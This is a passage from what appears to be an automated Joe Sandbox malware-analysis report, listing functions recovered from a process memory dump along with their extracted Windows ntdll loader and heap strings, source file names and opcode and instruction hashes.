                                                                                                                        • Opcode Fuzzy Hash: 48b1361098463ef002edbc5b8e2719b694cf45a9b9502bdeb0d0a947592f540c
                                                                                                                        • Instruction Fuzzy Hash: 7E917B71A08344AFDB21EE61CC55FBBBAE8FF88744F40492EFA8492150E774D944CB62
                                                                                                                        Function 05340C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 053954ED
                                                                                                                        • HEAP[%wZ]: , xrefs: 053954D1, 05395592
                                                                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 053955AE
                                                                                                                        • HEAP: , xrefs: 053954E0, 053955A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                        • API String ID: 0-1657114761
                                                                                                                        • Opcode ID: e47b66b3d83e687ee095343c5863fc84dfadc2a92780047e81af9f6567ab04f7
                                                                                                                        • Instruction ID: c01afd51d941e91241d2d36b05a82bc4de6f34b235c2a427ef7ccd017c59f6c9
                                                                                                                        • Opcode Fuzzy Hash: e47b66b3d83e687ee095343c5863fc84dfadc2a92780047e81af9f6567ab04f7
                                                                                                                        • Instruction Fuzzy Hash: 8EA1E074704645DFDB2CDF28C498BBABBE6BF45300F148569E5868F682D770B884CB90
                                                                                                                        Function 0536273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • .Local, xrefs: 053628D8
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 053A21DE
                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 053A21D9, 053A22B1
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 053A22B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                        • API String ID: 0-1239276146
                                                                                                                        • Opcode ID: 44744ded81cd1788053495af73c6a26706cd3eda53ea6e364e4380a508350d5a
                                                                                                                        • Instruction ID: 7c5f26a730fc1062afbe2e37994a20e5dd9e0863a40fd8f6f62d80bfefe35a84
                                                                                                                        • Opcode Fuzzy Hash: 44744ded81cd1788053495af73c6a26706cd3eda53ea6e364e4380a508350d5a
                                                                                                                        • Instruction Fuzzy Hash: E3A1A239A04229DBCB24CF64CC88BAAB3B5FF58314F1581EDE809A7655D7709E80CF90
                                                                                                                        Function 053364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0539106B
                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05391028
                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05390FE5
                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 053910AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                        • API String ID: 0-1468400865
                                                                                                                        • Opcode ID: 8639c52639c38b1f040cf68a064765a9f7fb913511af0d1983de07506c4c7eed
                                                                                                                        • Instruction ID: 029a553a70c99ba19dc4af81c6f0b51574ab42500a814921f59e31fb4d356178
                                                                                                                        • Opcode Fuzzy Hash: 8639c52639c38b1f040cf68a064765a9f7fb913511af0d1983de07506c4c7eed
                                                                                                                        • Instruction Fuzzy Hash: B571B1B1A04304AFDB20EF14C88AFA77FA9AF44764F400568F9498B646D774D588CBD2
                                                                                                                        Function 05364D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 053A365C
                                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 053A3640, 053A366C
                                                                                                                        • LdrpFindDllActivationContext, xrefs: 053A3636, 053A3662
                                                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 053A362F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                        • API String ID: 0-3779518884
                                                                                                                        • Opcode ID: 39d4b94f8732ab8e40f3aaa549a17b14cd04a2a21084e2c88c12d9dfbbc8e1e2
                                                                                                                        • Instruction ID: 60d7041e42bec3f5a5971cb44606c957e976a07925bfdaf110e692c72939f22a
                                                                                                                        • Opcode Fuzzy Hash: 39d4b94f8732ab8e40f3aaa549a17b14cd04a2a21084e2c88c12d9dfbbc8e1e2
                                                                                                                        • Instruction Fuzzy Hash: 30311732E04211AEDF39EA08C8CDF79A6A9FB02754F06C42EE8055756ADBF0DC808795
                                                                                                                        Function 0535245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0539A9A2
                                                                                                                        • LdrpDynamicShimModule, xrefs: 0539A998
                                                                                                                        • apphelp.dll, xrefs: 05352462
                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0539A992
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-176724104
                                                                                                                        • Opcode ID: df0178a155eb0f271ada3c72ed8bd4e6c2b1c200e6a52a12526247cb8e1093ca
                                                                                                                        • Instruction ID: 3166fe677d42b6878c6b93ccc184946801c886284f01990ecfd255937242435a
                                                                                                                        • Opcode Fuzzy Hash: df0178a155eb0f271ada3c72ed8bd4e6c2b1c200e6a52a12526247cb8e1093ca
                                                                                                                        • Instruction Fuzzy Hash: 7E314AB1710211ABDF39DF59D846EBE7BB6FB84B10FA60519F901AB640CBB05981C750
                                                                                                                        Function 05340770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                        • API String ID: 0-4253913091
                                                                                                                        • Opcode ID: 643c0bfb2301278b3ee33468c76a246867d7bc3871e5fd124923f82942152933
                                                                                                                        • Instruction ID: 056372cd87520ff9d9132c8c4c77784393c409243327d6501cbb0f2aeb3f1b65
                                                                                                                        • Opcode Fuzzy Hash: 643c0bfb2301278b3ee33468c76a246867d7bc3871e5fd124923f82942152933
                                                                                                                        • Instruction Fuzzy Hash: 21F17570B00605EFDB2ACF68C898B6AB7F6FF44304F1481A8E5569B791D774A981CF90
                                                                                                                        Function 0532A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                        • API String ID: 0-2779062949
                                                                                                                        • Opcode ID: 2772792c99b64749792ab9428993c6d6cac7862e570387b2bcf45f1cd7699358
                                                                                                                        • Instruction ID: 0790acee2675fb54ca7d16b97315ea5b10af8f97ae2e2ee774db48819ba98027
                                                                                                                        • Opcode Fuzzy Hash: 2772792c99b64749792ab9428993c6d6cac7862e570387b2bcf45f1cd7699358
                                                                                                                        • Instruction Fuzzy Hash: 2BA1697190162D9BDB35EB64CC88BAAB7B8FF44710F1001E9E909AB250D775AEC5CF60
                                                                                                                        Function 0532CCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0532CD34
                                                                                                                        • InstallLanguageFallback, xrefs: 0532CD7F
                                                                                                                        • @, xrefs: 0532CD63
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                        • API String ID: 0-1757540487
                                                                                                                        • Opcode ID: 95518b3127ff4a88f20abb2a8ed94f930a923c1cce9926ae8c639828731938c5
                                                                                                                        • Instruction ID: e9424a1bb5ca2efac41385689ac0a50fbe1695039fac94238b9c9c18bbcb7432
                                                                                                                        • Opcode Fuzzy Hash: 95518b3127ff4a88f20abb2a8ed94f930a923c1cce9926ae8c639828731938c5
                                                                                                                        • Instruction Fuzzy Hash: 8151AE766083599BCB14EF64C448A7BB7E8BF88664F44092FF986D7340E774DA04C7A2
                                                                                                                        Function 0536C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 053A82D7
                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 053A82DE
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 053A82E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-1783798831
                                                                                                                        • Opcode ID: 1bf7a7cae59a3ade9a50b69931f219b986ec7a448606f4e89f1c8ab55bd26b46
                                                                                                                        • Instruction ID: 77963d9e026ac09f1aa57f07798d17c1a44142685dc8ca66dcd801096372634c
                                                                                                                        • Opcode Fuzzy Hash: 1bf7a7cae59a3ade9a50b69931f219b986ec7a448606f4e89f1c8ab55bd26b46
                                                                                                                        • Instruction Fuzzy Hash: D841F672614314EBC724EB64D849F9B7BE9FF44750F40982AF985D3250EB70E800CB92
                                                                                                                        Function 053EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • @, xrefs: 053EC1F1
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 053EC1C5
                                                                                                                        • PreferredUILanguages, xrefs: 053EC212
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                        • API String ID: 0-2968386058
                                                                                                                        • Opcode ID: 1b3d8aa7df03a89f2ee43d83976abed8463ae3ec36f0e1376607f411d04b467e
                                                                                                                        • Instruction ID: aa30e7844a445ba35c219b3f48a09e3d0da124ea51035629cd7a9fa9a5efc356
                                                                                                                        • Opcode Fuzzy Hash: 1b3d8aa7df03a89f2ee43d83976abed8463ae3ec36f0e1376607f411d04b467e
                                                                                                                        • Instruction Fuzzy Hash: 32416D72E0022DEBDF15DAD8C895FEEB7F9BB14700F14406AE906B7280D7B49E448B94
                                                                                                                        Function 053B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 053B4888
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 053B4899
                                                                                                                        • LdrpCheckRedirection, xrefs: 053B488F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                        • API String ID: 0-3154609507
                                                                                                                        • Opcode ID: 2c48eeca91e97dd9542fce45b4405c87c542c152eef5c07c5e623701686fe5cf
                                                                                                                        • Instruction ID: 902ce30b3deca12e801a2932f3ff19f51481eecca7bb589e831867bee2bb5d4f
                                                                                                                        • Opcode Fuzzy Hash: 2c48eeca91e97dd9542fce45b4405c87c542c152eef5c07c5e623701686fe5cf
                                                                                                                        • Instruction Fuzzy Hash: C341F632A043609BEF22CE58D441EA67BEBFF89650B050559FE59D7A12D7B1D800CB85
                                                                                                                        Function 053C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                        • API String ID: 0-1373925480
                                                                                                                        • Opcode ID: a075a1aac9bcd86456805c8db314915bdcb65b66a1a7b8f22ecaf7c4b79f5b26
                                                                                                                        • Instruction ID: 602d5afe87bd21d103bca2c1d52aa8940e8cdae209abf6979381f1760a560c78
                                                                                                                        • Opcode Fuzzy Hash: a075a1aac9bcd86456805c8db314915bdcb65b66a1a7b8f22ecaf7c4b79f5b26
                                                                                                                        • Instruction Fuzzy Hash: BC41F371A042488BEF26DBA4C855BADBBF9FF55340F24049ED842EB781DBB59D01CB10
                                                                                                                        Function 053B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 053B2104
                                                                                                                        • LdrpInitializationFailure, xrefs: 053B20FA
                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 053B20F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-2986994758
                                                                                                                        • Opcode ID: 92f5ba4161269e309a2c632a074d01757580abd859bbc1a7276b2f4ffdbbad14
                                                                                                                        • Instruction ID: 0d4f4ee6698e8459e59d5608e490b1e114bde8734ec061853314494168b59028
                                                                                                                        • Opcode Fuzzy Hash: 92f5ba4161269e309a2c632a074d01757580abd859bbc1a7276b2f4ffdbbad14
                                                                                                                        • Instruction Fuzzy Hash: 1EF0C239750318ABEB28EA5DDC47FDA3B68EB40B54F500455FB016BA81DAF0A900D695
                                                                                                                        Function 053403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: #%u
                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                        • Opcode ID: 62b6d4f94a45f1d477dcb1d8b7d5306fe159b9c521fba2286ff90e3f46ade848
                                                                                                                        • Instruction ID: 0eba113cfa5b96acf404700e297f7b14865d19da31bb9f8d2b32493e8cec1640
                                                                                                                        • Opcode Fuzzy Hash: 62b6d4f94a45f1d477dcb1d8b7d5306fe159b9c521fba2286ff90e3f46ade848
                                                                                                                        • Instruction Fuzzy Hash: F3714CB1A002499FDF19DFA8C994FAEB7F8FF48704F144065E905AB251EA74ED41CB60
                                                                                                                        Function 05332FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @4Cw@4Cw$PATH
                                                                                                                        • API String ID: 0-1794901795
                                                                                                                        • Opcode ID: f032d63867eaee62b0420d11f5a8319cbcd3cb886db1bbee1657aa84cb496f12
                                                                                                                        • Instruction ID: 0677f195091542fe5b8eedf4f4fd3b2863cc668f2570bf07c488465e91a4f589
                                                                                                                        • Opcode Fuzzy Hash: f032d63867eaee62b0420d11f5a8319cbcd3cb886db1bbee1657aa84cb496f12
                                                                                                                        • Instruction Fuzzy Hash: 60F1B071E14228DBCB25DF98D882AFEBBB5FF48710F958429F441EB250DB74A841CB61
                                                                                                                        Function 053FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: `$`
                                                                                                                        • API String ID: 0-197956300
                                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                        • Instruction ID: 7ea293636528e3460d63e6fb00994ad536a54a6ed33b8b7218f11925f04bc0ec
                                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                        • Instruction Fuzzy Hash: 7EC1C1312083469FD724CF24C845B6BBBE6BF84358F044A2DF69ACA290D7B4E509CB51
                                                                                                                        Function 053D2F60 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 053D3011
                                                                                                                        • , xrefs: 053D32B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                                                        • API String ID: 0-4088147954
                                                                                                                        • Opcode ID: 5c785d72297a9406324cf7c7272b691013e9a07ba6bb77eda4adf7bb4e2e3cfc
                                                                                                                        • Instruction ID: a65b8760392ea7c90e06fbd2d21d279543af10788a47d5bdee97d179ec72004f
                                                                                                                        • Opcode Fuzzy Hash: 5c785d72297a9406324cf7c7272b691013e9a07ba6bb77eda4adf7bb4e2e3cfc
                                                                                                                        • Instruction Fuzzy Hash: 55C19B32A083419BDB21DF65D484B2BF7FABF88614F04891DF98697240D7B4DD458BA3
                                                                                                                        Function 053AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                        • Opcode ID: a3dcf268207eef4905978492775e61b0ad1fb4cff0f78313175e65a9abcb40cf
                                                                                                                        • Instruction ID: 8e42525c67cf955980a2694ab0e6f6e2ee4944615184df9ed675431c7a8c0e7b
                                                                                                                        • Opcode Fuzzy Hash: a3dcf268207eef4905978492775e61b0ad1fb4cff0f78313175e65a9abcb40cf
                                                                                                                        • Instruction Fuzzy Hash: 34615C72E043189FDB26DFA8C884BAEBBBDFB44700F50402DE559EB291D731A900DB50
                                                                                                                        Function 0533AC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • LdrpResGetMappingSize Enter, xrefs: 0533AC6A
                                                                                                                        • LdrpResGetMappingSize Exit, xrefs: 0533AC7C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                                        • API String ID: 0-1497657909
                                                                                                                        • Opcode ID: cb2a3f2a5cb5740afbd3473744f96a9f7671598ad19b682c967729642dd6961f
                                                                                                                        • Instruction ID: ae01cc8d2397cd24875782062af66b29de5d37ab4254a37256703becc0e080ab
                                                                                                                        • Opcode Fuzzy Hash: cb2a3f2a5cb5740afbd3473744f96a9f7671598ad19b682c967729642dd6961f
                                                                                                                        • Instruction Fuzzy Hash: 1E61F5B1A08645DFEF25DFA8C891BADB7BAFF04711F140529E882EB690D7B4D940C720
                                                                                                                        Function 053D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$MUI
                                                                                                                        • API String ID: 0-17815947
                                                                                                                        • Opcode ID: 75c2cc517a1431dd3ddfa06da29ad682086a8bf0934db7476f7dcd19b812dd60
                                                                                                                        • Instruction ID: 7ea6c021f5bfde010aad14a0803a7218ec6bb3d419b9357fcc6ea4fbc4579998
                                                                                                                        • Opcode Fuzzy Hash: 75c2cc517a1431dd3ddfa06da29ad682086a8bf0934db7476f7dcd19b812dd60
                                                                                                                        • Instruction Fuzzy Hash: 7A5127B2E0021DAEDF11DFA5DC84EEEBBB9FB48654F100529E511A7280E7B49E45CB60
                                                                                                                        Function 05364C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0$Flst
                                                                                                                        • API String ID: 0-758220159
                                                                                                                        • Opcode ID: 50526f710102886fc2416fa60f99edff55fcffaa9e43a9a178894c0049533d01
                                                                                                                        • Instruction ID: d1b7da1125b25b0e9ca834c039176e0bf7377cf5df817284ef0524da068f5869
                                                                                                                        • Opcode Fuzzy Hash: 50526f710102886fc2416fa60f99edff55fcffaa9e43a9a178894c0049533d01
                                                                                                                        • Instruction Fuzzy Hash: F65169B2E002189BCF29DF99C484AADFBF6FF44714F14C42ED0499B255EBB09985CB80
                                                                                                                        Function 053304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • kLsE, xrefs: 05330540
                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0533063D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                        • API String ID: 0-2547482624
                                                                                                                        • Opcode ID: b2cc40b6f5e17f97c13bc99a5316b3e2b0d52b7cb10208b2a3605d76cef90a38
                                                                                                                        • Instruction ID: 83fea02338ccf5083fe1060eab950a7527d56df785a9b623c7960899ef55333f
                                                                                                                        • Opcode Fuzzy Hash: b2cc40b6f5e17f97c13bc99a5316b3e2b0d52b7cb10208b2a3605d76cef90a38
                                                                                                                        • Instruction Fuzzy Hash: E551BF716087468BD728EF65C44AAA7B7E5FF84300F00493EE9AA87240E7B0D545CB92
                                                                                                                        Function 0533A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0533A309
